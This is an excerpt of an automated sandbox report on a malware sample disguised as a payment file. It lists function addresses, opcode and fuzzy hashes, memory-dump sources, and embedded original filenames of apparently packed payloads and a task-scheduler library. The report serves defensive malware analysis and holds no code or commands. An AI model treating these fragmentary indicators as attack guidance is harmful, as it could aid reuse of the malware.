Instruction Fuzzy Hash: E4F0AE79904228CFDB25DF24C9487DAB6B1BB4838AF1080EAA609A7384E7344E84CF51

Function 027E0F88 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002029a043b70a7646dfb563bdb0398e9a155382e393ff3c1992364e6625657d
Instruction ID: 434bb206c2b00617f79913afab1ba020453fe8f9adea95a5adba8942363fe020
Opcode Fuzzy Hash: 002029a043b70a7646dfb563bdb0398e9a155382e393ff3c1992364e6625657d
Instruction Fuzzy Hash: 9DD01273A4C232DEEF252A154C312ACB7B09F1E742B5909A4CC93F7181D775E81AD1B1

Function 027EE1E0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153e2dfc54560785f7de478b6131e2541192fa07af5675fe7205a8c884c09573
Instruction ID: 5df12b10fba012be1d3825c4477c60cea445a78dabd7092d1e4a7b864ffb0b61
Opcode Fuzzy Hash: 153e2dfc54560785f7de478b6131e2541192fa07af5675fe7205a8c884c09573
Instruction Fuzzy Hash: 0EC08C3018520483D79437E4680E36873DC0B0A216F019000D30D42092CEB400A0C6BA

Function 027E08B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63d8e4d4217a1edc8cf3b523b7971ca22220eb58ea27cab2ddd38bd75244aa
Instruction ID: cbb5f68915096ab238eed4b885f75ecb7b2d7dd1b552c92cc3d21dea2e371a98
Opcode Fuzzy Hash: 7d63d8e4d4217a1edc8cf3b523b7971ca22220eb58ea27cab2ddd38bd75244aa
Instruction Fuzzy Hash: E3900271045A0C8B4A402795780A556B75CA5495157980051F51D425119E6564104695

Non-executed Functions

Function 027EA040 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

4'q, xrefs: 027EA132
4'q, xrefs: 027EA107

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 0d699975f95dba013180b32e92c76cfac0a2f58c63dc29a832c86b77b299ce4b
Instruction ID: 4ede788e88f417ee2edfdc1e437ca08413ee8e7fa606d0ab60edc421a1dee7ea
Opcode Fuzzy Hash: 0d699975f95dba013180b32e92c76cfac0a2f58c63dc29a832c86b77b299ce4b
Instruction Fuzzy Hash: 96713170D00A088FDB49EF7AE85669DBBF3BBC9300F18C169D0049B269EF709945CB61

Function 027EA050 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 027EA132
4'q, xrefs: 027EA107

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 22312f5ae6fd662abd513e501bc62df90ca11fb505246d92f736d8a646f38e3e
Instruction ID: 47fed9535347e1c4b345685139351cf624b3cb9a58ffd45aa27917fcf0ce9423
Opcode Fuzzy Hash: 22312f5ae6fd662abd513e501bc62df90ca11fb505246d92f736d8a646f38e3e
Instruction Fuzzy Hash: B4710070E00A058FDB49EF6AE85669DBBF3BB89300F18C169D0049B269EF749945CB61

Function 06F10040 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

[, xrefs: 06F1521C

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: f359aea7defa861a9f27c878db6ec8c348513f8861d16d25f5bb726e19b9e6f1
Instruction ID: ac51fcd0487f2917dd3ad5737862ce1befb79570d5e656c01379d3b567da0c52
Opcode Fuzzy Hash: f359aea7defa861a9f27c878db6ec8c348513f8861d16d25f5bb726e19b9e6f1
Instruction Fuzzy Hash: 52413B71E056188FDB68CF2AC8086DAB7F7BF89300F04D0EAD509A7618DB744A85CF41

Function 06F2DBD0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6483f0685b19906e7a6ecea3776b7a6e007b1398b4cb3d0ee3040113b50455cd
Instruction ID: 241603377862e78cad75ea7664b0f5be51fe2bc48c33ca571c48953015c6f9b8
Opcode Fuzzy Hash: 6483f0685b19906e7a6ecea3776b7a6e007b1398b4cb3d0ee3040113b50455cd
Instruction Fuzzy Hash: 3D812771D45229CFEBA4DF69C8847EDBBB6BF4A300F5090A9C009A7251DBB49AC5CF41

Function 06F10006 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253ae8414714cdd054711b4fbb5d0a744b9f89bd263937b55dddb7fdc11b6fc2
Instruction ID: 53864d0810c74cb14e12ffd267c203f58f5f58c1f6c38ee9482fb104ee10b22a
Opcode Fuzzy Hash: 253ae8414714cdd054711b4fbb5d0a744b9f89bd263937b55dddb7fdc11b6fc2
Instruction Fuzzy Hash: 02315071D097598FE71ACF2BCC1429ABBF7AF85300F08C0FAD448AA265DB740A818F51

Function 027EA9E0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c7c31508b20c5f78f5e1540dc504b962f871a14732994bce342ca677e0729a6
Instruction ID: ac193d82ab75f8945478c1baf2984df28119694e03090261a2f9b8a2015e48f3
Opcode Fuzzy Hash: 1c7c31508b20c5f78f5e1540dc504b962f871a14732994bce342ca677e0729a6
Instruction Fuzzy Hash: E931C9B1E056188BEB28CF5BC94479EFBF7AFC9304F14C0A9C40CA6264DB740A858F11

Function 05653468 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161a1836cb47eda85c2f2f602a51b5e371803936a3dac2b7caa96c1744efd699
Instruction ID: e4f055e22c2248fdc4e984af6e06940abc8b26facea5d738e1c1efbad6530bb2
Opcode Fuzzy Hash: 161a1836cb47eda85c2f2f602a51b5e371803936a3dac2b7caa96c1744efd699
Instruction Fuzzy Hash: 671126B1E006089BEB19CF6BC80029EFBF7AF89300F14C56AC918AB265EB740545CF90

Function 06F2A190 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

(oq, xrefs: 06F2ABE5
\sq, xrefs: 06F2A999
+, xrefs: 06F2A1E0
!, xrefs: 06F2A9F9

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: !$(oq$+$\sq
API String ID: 0-2405194844
Opcode ID: d9eb85f508991a1ee0b24ca66a35dacb37f28c5a4cefb3ab5af8bd75e1a37e90
Instruction ID: 6766095dbafb89cf10b42fa5ffa0eecd5eb51175d1f0c3cf1e1b223611b367c8
Opcode Fuzzy Hash: d9eb85f508991a1ee0b24ca66a35dacb37f28c5a4cefb3ab5af8bd75e1a37e90
Instruction Fuzzy Hash: C2212831E04229DFDBA4DF65CC447EAB7B6BB89300F0081AAC519A7250DB705A85CF81

Analysis Process: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exePID: 8140, Parent PID: 3968COMMON

Executed Functions

Function 026E1A1F Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

Teq, xrefs: 026E1B26
Teq, xrefs: 026E1A96

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 299815d9bcbefc80a1b32ef4ffa6712f95e1a2c5f508eae71b0bddf632af3787
Instruction ID: 75cfc154234302ffc12d97eef7364d08a6cff70f19c884b70e6cdb364e7d5d66
Opcode Fuzzy Hash: 299815d9bcbefc80a1b32ef4ffa6712f95e1a2c5f508eae71b0bddf632af3787
Instruction Fuzzy Hash: 61410B74B11204CFCB48DFA8D598AAEBBF2BF8D310B2544A9E506AB361DB709C01CF50

Function 026E1EC8 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48dd6eb36bda301906d8247b5a511729e60e66ed18a4e74b3d2a9b2805eaad21
Instruction ID: fe66054daa090ffd89a20a1154c4f433e470291035a9e78e8e1f382e1bd8a6ff
Opcode Fuzzy Hash: 48dd6eb36bda301906d8247b5a511729e60e66ed18a4e74b3d2a9b2805eaad21
Instruction Fuzzy Hash: 19D103346006848FDB16DF38C661A9ABFF6FF45310B188198D9429B366DF71ED46CB80

Function 026E1EB9 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a07ae3461bcabca576b4aac86caf29fa163077a5cec635cd316280ded3a4e5
Instruction ID: 853ee298f2d4af367812f27e91f6a043f9e419b130e8cb78a870d8b1c3b2742f
Opcode Fuzzy Hash: 64a07ae3461bcabca576b4aac86caf29fa163077a5cec635cd316280ded3a4e5
Instruction Fuzzy Hash: 40618E75600600CFCB14DF29D594A99BBF7BF88710B1581A9E906EB3A9DB71EC41CF90

Function 026E08A8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3ecfb0eb3b4e60ff05cae811297d0f2f9ca02b7b0113f3dec1fbab2a37ae806
Instruction ID: fd97c3974e9d778542a706566966d671da80d083be8b009c8ff56ef589998e70
Opcode Fuzzy Hash: d3ecfb0eb3b4e60ff05cae811297d0f2f9ca02b7b0113f3dec1fbab2a37ae806
Instruction Fuzzy Hash: 3F21C035709204CFDB148B28D888B2A7BE5EF99304F1544A9E107DB3B2DAB1EC02CB21

Function 00BAD3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 045dec811fcf6b9198b807366236b0d3085060ffd1e07398661957ddf92d83db
Instruction ID: 05a0700600972d9c935eec490f8f012976e039458a642824bb46c1268022a131
Opcode Fuzzy Hash: 045dec811fcf6b9198b807366236b0d3085060ffd1e07398661957ddf92d83db
Instruction Fuzzy Hash: 8B2125B1508340DFDB05DF10D9C0B26BBA5FB98314F20C5A9E80A0BB56C736E856CBA2

Function 00BAD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab5b5572e3011779fb6bf266da2c0bc67b9eecc7b6856e8edaff4a9e0567337
Instruction ID: 89807ce37b73e8d9548302236aba3784699327fc184dd5804cf99e22288a114e
Opcode Fuzzy Hash: 3ab5b5572e3011779fb6bf266da2c0bc67b9eecc7b6856e8edaff4a9e0567337
Instruction Fuzzy Hash: DB213A71908340DFDB15DF14D9C0B26BFA5FB99318F30C5A9D90A0B656C336D856CBA2

Function 00BAD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
Instruction ID: 4dcaf7621b496d8b568045922ccdca164d2eb75d42a20cd3285624d779ee2793
Opcode Fuzzy Hash: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
Instruction Fuzzy Hash: FC11B1B6908240CFDB16CF14D5C4B16BFB2FB95324F24C5A9D90A0B656C336D856CBA2

Function 00BAD3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
Instruction ID: bc5e13b89d9f8e20e9482cf12b37640de7078f8f0d0b944bd2ee8a594fd7814c
Opcode Fuzzy Hash: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
Instruction Fuzzy Hash: 2911B176504280CFDB16CF10D5C4B16BFB1FB98314F24C5E9D84A0B656C336E856CBA1

Function 026E5197 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb94de60d728154f4a5a83eafa4050a25644b34f9ec96e64f436a6b193902d1
Instruction ID: bf163f35e28daa21eef668fa4388e0eb3fbe71e3ee7809f3363de7e4d0a1c870
Opcode Fuzzy Hash: 5cb94de60d728154f4a5a83eafa4050a25644b34f9ec96e64f436a6b193902d1
Instruction Fuzzy Hash: 5F116078D0A104DFDB04DFA4D5883ADBBF5EB49309FA080E6D40B97355DBB88A86CB41

Function 026E51F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e19c0768832296d8575e165cb940129cc5a02a7df913b757ec47cf3d7d0f0a7
Instruction ID: 1689c66361cf1a955bc4ea8e31d296ae45a3727651212cfe5f03aee1997723db
Opcode Fuzzy Hash: 9e19c0768832296d8575e165cb940129cc5a02a7df913b757ec47cf3d7d0f0a7
Instruction Fuzzy Hash: 94114675D0A104DFDB04DFA4D4893ADBBF5EB55309F6080E5D4079B355DBB44A86CB01

Function 026E5200 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f963eb1aa9b05d17638acf9eac80fe1b1b6ae767261b5d91d401cbbab9c8d3d
Instruction ID: 54ac5bfb6f994a306fbbdefa4aebe55bc783deb06b8ba5c4ef7c42ba2985bb29
Opcode Fuzzy Hash: 2f963eb1aa9b05d17638acf9eac80fe1b1b6ae767261b5d91d401cbbab9c8d3d
Instruction Fuzzy Hash: B1111B78D1A108DFDB04DFA5E5883ADBBF5EB58309FA080E5D40B97344DBB45A86CB41

Function 026E0899 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bac10644283b6bb3619da0e9c4cb45a8f4f566a4aeb774c4056d4f9d816474e
Instruction ID: 7b49750a6d1166c683c22f605263c76eb9d090b0b7a4277e0264f9cbbc51a65e
Opcode Fuzzy Hash: 9bac10644283b6bb3619da0e9c4cb45a8f4f566a4aeb774c4056d4f9d816474e
Instruction Fuzzy Hash: 14F09E353092009FE71446689D44B6B37C6EBD9308F184179E20BD7352D9A19C06C360

Function 026E13D5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fbc082f1e1b34b6312e4d91e2960d59a4b84e56c4d69960dfb33f0116fc0a8
Instruction ID: af4b18dbdcf889a96c450a9ed4ef9d280854dc93fe5ffe4d5acf2f18d253f36c
Opcode Fuzzy Hash: 84fbc082f1e1b34b6312e4d91e2960d59a4b84e56c4d69960dfb33f0116fc0a8
Instruction Fuzzy Hash: E801AF72F095008FDB569F24E4442A6B7E2FBBA701F0680F5910A6B356EFB08C46CB52

Function 026E198C Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b673e1325dfacb2b07c147e6eec4496dedae1dc14eb3bc612f706b5cb19c337
Instruction ID: 48d89be093128adb3920a54d8dccc4b63fd230cdb814c025fb164eb0d9e0cdb4
Opcode Fuzzy Hash: 9b673e1325dfacb2b07c147e6eec4496dedae1dc14eb3bc612f706b5cb19c337
Instruction Fuzzy Hash: 2FF082796156508FC7518B34E458A663FE1AF5D215B16019DD14AC736ADAA18C00CB01

Function 026E19E8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe26c7b8e6a1db87f968b325b15c2e0d5dc22b80988860f98d263ba16310712
Instruction ID: 53d99136b5444c9387cf1b64f12951663c7b9706c81e54a93f85705f0a4d5b81
Opcode Fuzzy Hash: 8fe26c7b8e6a1db87f968b325b15c2e0d5dc22b80988860f98d263ba16310712
Instruction Fuzzy Hash: 85E0C2357043D08FC702ABB8E85C0A97FB5AF4A21234504DBE409CB7B7DB748C518B50

Function 026E666C Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae14437d78bbd8f7247b0844efd4dc44c545c73d5558a7d8a96b491ce26977ef
Instruction ID: 099a64ed17ae417ef3cb662cca5ddbface9dbd1f8d9dc77c333789d15b340fce
Opcode Fuzzy Hash: ae14437d78bbd8f7247b0844efd4dc44c545c73d5558a7d8a96b491ce26977ef
Instruction Fuzzy Hash: D4E01A34B016419FEB18AF38DC4C6A877E6ABC9301F4045A5E64BE32A0EEB88941DF01

Function 026E0860 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93593e917088791a19e1404007037a279c4e87a09a038daa74b0ae39d0cf5abd
Instruction ID: 87fd62efa2eac221d774dd799c3e1f9e1e3e7492dd811d6ac3b4704dad2ccdf3
Opcode Fuzzy Hash: 93593e917088791a19e1404007037a279c4e87a09a038daa74b0ae39d0cf5abd
Instruction Fuzzy Hash: 34D0C7CFA1E7D08FD307462178E1BD01E50AF29109F4B01D64A44476D7908889058641

Function 026E19F8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184847bfd765bcfaadf56c11cf1ff25c1579e0b7590688ac4fd0ed2da7960c2a
Instruction ID: 70c241269385de5838280818f0f88c41e96b349c1ca105b7c3b53c591c6015f5
Opcode Fuzzy Hash: 184847bfd765bcfaadf56c11cf1ff25c1579e0b7590688ac4fd0ed2da7960c2a
Instruction Fuzzy Hash: 4ED092357002548FCA00ABB9E8088AA7BA9AF8966170101A5E90AC7762DFB59C418B94

Function 026E3D52 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9212d2362ec8586429353325cd12adaf4e642423f1a5b94f2f3c8e8fb5361fdf
Instruction ID: 58e13ced17b0dea72bb48bb40b916d40b518bf4fd6ec6d0ae4565af058a78b35
Opcode Fuzzy Hash: 9212d2362ec8586429353325cd12adaf4e642423f1a5b94f2f3c8e8fb5361fdf
Instruction Fuzzy Hash: FAC08C30A10508EFCF293B90EC14AFC7AB3FF44300F400129FA02672A0CEA10D02CB12

Function 026E0950 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171bb426f8ca650e38e847561a4a28ed733c8bae44d4327343ac8451bf8f4581
Instruction ID: 07f163bebc080b1cb255dd4f26a778316f92f5a6c58de1dc4222fb3e8018c950
Opcode Fuzzy Hash: 171bb426f8ca650e38e847561a4a28ed733c8bae44d4327343ac8451bf8f4581
Instruction Fuzzy Hash: 02C02BFA48C7880FD723037034C47893F014B3D10BF47018AC445471B3F4C004018712

Function 026EC740 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf82bc61a70f151d75b376839ce5ad5ce90d87add4e07551091fb6564547338
Instruction ID: 3b763d43cd92d4ce86b0d673862f608bdcba5985e7606854c9a5c33fa52404fc
Opcode Fuzzy Hash: 7bf82bc61a70f151d75b376839ce5ad5ce90d87add4e07551091fb6564547338
Instruction Fuzzy Hash: 8DA02230083B0C828A0033B02000020338E080020C3C000BC8A0E08B200833E0A08888

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003F22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003E72000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1642929348.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameYqvrmkgm.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
